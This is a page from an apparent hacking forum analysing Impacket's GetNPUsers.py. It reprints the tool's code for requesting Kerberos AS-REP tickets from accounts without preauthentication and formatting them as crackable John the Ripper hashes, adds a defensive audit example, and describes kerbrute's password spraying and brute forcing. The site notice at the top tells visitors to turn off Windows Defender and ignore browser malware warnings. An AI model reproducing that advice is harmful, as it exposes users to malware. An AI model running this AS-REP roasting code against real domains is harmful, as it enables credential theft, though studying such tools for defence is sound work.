Hackers News / Hacker University

Donation bitcoin (Bitcoin address for donations)

1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4

Donated bitcoin is used to help "security-vulnerable" groups.


Notice

1. The warning window in the MS Edge browser goes away if you turn off 'Windows Defender'.

             'Turn off Windows Defender'

2. The malware warning shown when connecting with the Chrome browser is a Google Chrome error, i.e. a false positive (detection error), so you can ignore it.

3. We would like to let you know that this site is safe and clean.

4. The indiscriminate 'false-positive abuse' by the giant corporations' browsers against innocent sites is infringing on users' freedom to share information. In response, we are preparing a lawsuit against these companies.





Hacker Mall
No. 3976
Category: Utility
Type: Brutus
File type: Link
License: Open source
Supported OS: Windows/Linux
Cracked: na
2024/3/11 (Mon)
Views: 310
GetNPUsers.py Tool Analysis

https://github.com/fortra/impacket/blob/master/examples/GetNPUsers.py

 

This code is a script that uses the Impacket library to find users in an Active Directory domain that have the "Does not require Kerberos preauthentication" attribute set, obtain those users' TGTs (Ticket Granting Tickets), and print them in John the Ripper format.

 

- Code analysis

getMachineName(97-118)

def getMachineName(self, target):
    # Open an anonymous (null-session) SMB connection only to learn the server's NetBIOS name
    try:
        s = SMBConnection(target, target)
        s.login('', '')
    except OSError as e:
        if str(e).find('timed out') > 0:
            raise Exception('The connection is timed out. Probably 445/TCP port is closed. Try to specify '
                            'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
        else:
            raise
    except SessionError as e:
        if str(e).find('STATUS_NOT_SUPPORTED') > 0:
            raise Exception('The SMB request is not supported. Probably NTLM is disabled. Try to specify '
                            'corresponding NetBIOS name or FQDN as the value of the -dc-host option')
        else:
            raise
    except Exception:
        if s.getServerName() == '':
            raise Exception('Error while anonymous logging into %s' % target)
    else:
        s.logoff()
    return s.getServerName()

s = SMBConnection(target, target): Creates an SMBConnection object. This object is used to establish a connection to the target server and attempt authentication. target is the server's IP address or host name.

s.login('', ''): Attempts an anonymous login using the SMBConnection object. This method takes a user name and a password as arguments; here empty strings are passed so the login is anonymous.

s.logoff(): Once the login has succeeded, logs the SMBConnection off. This terminates the connection and releases its resources.

return s.getServerName(): If the login succeeded, returns the server's name using the getServerName method of the SMBConnection object.

 

getTGT(126-

def getTGT(self, userName, requestPAC=True):
    clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

    asReq = AS_REQ()

    domain = self.__domain.upper()
    serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value)

    pacRequest = KERB_PA_PAC_REQUEST()
    pacRequest['include-pac'] = requestPAC
    encodedPacRequest = encoder.encode(pacRequest)

    asReq['pvno'] = 5
    asReq['msg-type'] = int(constants.ApplicationTagNumbers.AS_REQ.value)

    # The only pre-authentication data sent is PA-PAC-REQUEST; no encrypted timestamp is included
    asReq['padata'] = noValue
    asReq['padata'][0] = noValue
    asReq['padata'][0]['padata-type'] = int(constants.PreAuthenticationDataTypes.PA_PAC_REQUEST.value)
    asReq['padata'][0]['padata-value'] = encodedPacRequest

    reqBody = seq_set(asReq, 'req-body')

    opts = list()
    opts.append(constants.KDCOptions.forwardable.value)
    opts.append(constants.KDCOptions.renewable.value)
    opts.append(constants.KDCOptions.proxiable.value)
    reqBody['kdc-options'] = constants.encodeFlags(opts)

    seq_set(reqBody, 'sname', serverName.components_to_asn1)
    seq_set(reqBody, 'cname', clientName.components_to_asn1)

    if domain == '':
        raise Exception('Empty Domain not allowed in Kerberos')

    reqBody['realm'] = domain

    now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
    reqBody['till'] = KerberosTime.to_asn1(now)
    reqBody['rtime'] = KerberosTime.to_asn1(now)
    reqBody['nonce'] = random.getrandbits(31)

    # RC4-HMAC is requested first; AES types are only requested if the KDC rejects RC4
    supportedCiphers = (int(constants.EncryptionTypes.rc4_hmac.value),)

    seq_set_iter(reqBody, 'etype', supportedCiphers)

    message = encoder.encode(asReq)

    try:
        r = sendReceive(message, domain, self.__kdcIP)
    except KerberosError as e:
        if e.getErrorCode() == constants.ErrorCodes.KDC_ERR_ETYPE_NOSUPP.value:
            # RC4 not available, OK, let's ask for newer types
            supportedCiphers = (int(constants.EncryptionTypes.aes256_cts_hmac_sha1_96.value),
                                int(constants.EncryptionTypes.aes128_cts_hmac_sha1_96.value),)
            seq_set_iter(reqBody, 'etype', supportedCiphers)
            message = encoder.encode(asReq)
            r = sendReceive(message, domain, self.__kdcIP)
        else:
            raise e

    # This should be the PREAUTH_FAILED packet or the actual TGT if the target principal has the
    # 'Do not require Kerberos preauthentication' set
    try:
        asRep = decoder.decode(r, asn1Spec=KRB_ERROR())[0]
    except:
        # Most of the times we shouldn't be here, is this a TGT?
        asRep = decoder.decode(r, asn1Spec=AS_REP())[0]
    else:
        # The user doesn't have UF_DONT_REQUIRE_PREAUTH set
        raise Exception('User %s doesn\'t have UF_DONT_REQUIRE_PREAUTH set' % userName)

    # Let's output the TGT enc-part/cipher in John format, in case somebody wants to use it.
    if self.__outputFormat == 'john':
        # Check what type of encryption is used for the enc-part data
        # This will inform how the hash output needs to be formatted
        if asRep['enc-part']['etype'] == 17 or asRep['enc-part']['etype'] == 18:
            return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,
                                                 hexlify(asRep['enc-part']['cipher'].asOctets()[:-12]).decode(),
                                                 hexlify(asRep['enc-part']['cipher'].asOctets()[-12:]).decode())
        else:
            return '$krb5asrep$%s@%s:%s$%s' % (clientName, domain,
                                               hexlify(asRep['enc-part']['cipher'].asOctets()[:16]).decode(),
                                               hexlify(asRep['enc-part']['cipher'].asOctets()[16:]).decode())

This method obtains the TGT (Ticket Granting Ticket) for the given user. The main procedure is to build an AS request (AS_REQ) and send it to the server; it then receives the AS response (AS_REP) and extracts the TGT.

clientName = Principal(userName, type=constants.PrincipalNameType.NT_PRINCIPAL.value): Creates a Principal object from the user name. This object represents the subject, i.e. the user.

asReq = AS_REQ(): Creates the AS request object. This object is used to ask the authentication server for a TGT.

serverName = Principal('krbtgt/%s' % domain, type=constants.PrincipalNameType.NT_PRINCIPAL.value): Creates the Principal object for the authentication server (the krbtgt service); the TGT is requested for this principal.

asRep = decoder.decode(r, asn1Spec=AS_REP())[0]: Decodes the response message. If decoding it as a KRB_ERROR raised an exception, the response is treated as an AS_REP message.

if self.__outputFormat == 'john':: Checks whether the output format is 'john'.

return '$krb5asrep$%d$%s%s$%s$%s' % (asRep['enc-part']['etype'], domain, clientName,: Returns the TGT in John format.
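As an added example (not impacket's or this post's code), the following reproduces the two John line layouts that the etype check above distinguishes, parses such a line back into its fields, and checks the userAccountControl bit (UF_DONT_REQUIRE_PREAUTH, 0x400000) that the script's error message refers to, so an administrator can list which accounts are exposed. The account names and cipher bytes are constructed sample data.

```python
from binascii import hexlify, unhexlify

# userAccountControl bit for "Do not require Kerberos preauthentication"
UF_DONT_REQUIRE_PREAUTH = 0x400000
ETYPE_AES128, ETYPE_AES256, ETYPE_RC4 = 17, 18, 23


def accounts_without_preauth(records):
    """Names of accounts whose userAccountControl has the flag set.
    records: iterable of (sAMAccountName, userAccountControl) pairs, e.g. from an LDAP export."""
    return [name for name, uac in records if uac & UF_DONT_REQUIRE_PREAUTH]


def format_asrep_john(etype, domain, user, cipher):
    """Lay out an AS-REP enc-part the way GetNPUsers.py does for '-format john'.
    AES (17/18): the last 12 bytes are the checksum; REALM+user (the string-to-key salt) is one field.
    RC4-HMAC (23): the first 16 bytes are the checksum."""
    domain = domain.upper()
    if etype in (ETYPE_AES128, ETYPE_AES256):
        return '$krb5asrep$%d$%s%s$%s$%s' % (etype, domain, user,
                                              hexlify(cipher[:-12]).decode(),
                                              hexlify(cipher[-12:]).decode())
    return '$krb5asrep$%s@%s:%s$%s' % (user, domain,
                                       hexlify(cipher[:16]).decode(),
                                       hexlify(cipher[16:]).decode())


def parse_asrep_john(line):
    """Split a John line back into its fields (AES lines carry the salt, not user/domain separately)."""
    if not line.startswith('$krb5asrep$'):
        raise ValueError('not a krb5asrep line')
    fields = line[len('$krb5asrep$'):].split('$')
    if fields[0] in ('17', '18'):
        etype, salt, body, checksum = fields
        return {'etype': int(etype), 'salt': salt,
                'cipher': unhexlify(body), 'checksum': unhexlify(checksum)}
    principal, checksum = fields[0].split(':')
    user, domain = principal.split('@')
    return {'etype': ETYPE_RC4, 'user': user, 'domain': domain,
            'cipher': unhexlify(fields[1]), 'checksum': unhexlify(checksum)}


if __name__ == '__main__':
    # Constructed sample data: a fake LDAP export and a fake 40-byte enc-part
    export = [('alice', 0x200), ('svc_backup', 0x200 | UF_DONT_REQUIRE_PREAUTH)]
    print(accounts_without_preauth(export))          # ['svc_backup']
    fake_cipher = bytes(range(40))
    line = format_asrep_john(ETYPE_AES256, 'corp.local', 'svc_backup', fake_cipher)
    print(line)
    print(parse_asrep_john(line)['salt'])            # CORP.LOCALsvc_backup
```

Clearing the flag on the accounts the audit returns (or rotating them to long random passwords if a legacy application needs it) removes what the script looks for.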

 

outputTGT(225-

def outputTGT(entry, fd=None):
    # Print the John-format line and optionally append it to the output file
    print(entry)
    if fd is not None:
        fd.write(entry + '\n')

Prints the obtained TGT.

entry: the TGT to print.

If fd is not None, the TGT is also written to the file.

 

 

- Understanding the tools used

kerbrute

Kerbrute is a tool designed to help quickly brute-force and enumerate valid Active Directory accounts through Kerberos pre-authentication.

This tool focuses on two main attack methods.

1. Password Spraying: This attack technique tries a single password against many user names. It is used to spread the attack over a longer period to avoid account lockouts. Hackers use Kerbrute to test whether weak or commonly used passwords exist in the Kerberos database.

2. Brute Force Attacks: A brute-force attack systematically tries every possible combination of user name and password. Kerbrute performs dictionary attacks or generates password combinations to discover credentials.

john

"john" is short for John the Ripper, a powerful password-cracking and hash-cracking tool.

It is useful for evaluating password strength, identifying weaknesses, and improving security policy; however, legal restrictions and ethical considerations must be kept in mind when using it.


                   